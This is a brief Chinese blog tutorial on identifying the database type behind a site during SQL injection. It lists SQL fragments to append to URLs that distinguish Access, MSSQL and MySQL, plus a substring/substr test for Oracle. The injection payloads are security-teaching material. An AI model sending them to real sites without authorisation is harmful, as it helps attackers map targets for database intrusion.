美文网首页Pentest
SQL注入之判断数据库类型

SQL注入之判断数据库类型

作者: cws | 来源:发表于2016-07-12 18:06 被阅读165次

    1.扫描端口

    2.指纹信息

    3.在URL后面直接判断

    Access:
        and (select count(*) from MSysAccessObjects)>0 返回正常说明是access
        and exists(select count(*) from 表)
    SQLserver:
        and (select count(*) from sysobjects) >0 返回正常说明是mssql
    MySQL:
        and length(user())>0    返回正常说明是MySQL
    

    4.其他方法

    在mssql中可以调用substring。oracle则只可调用substr
    

    相关文章

      网友评论

        本文标题:SQL注入之判断数据库类型

        本文链接:https://www.haomeiwen.com/subject/pgcsjttx.html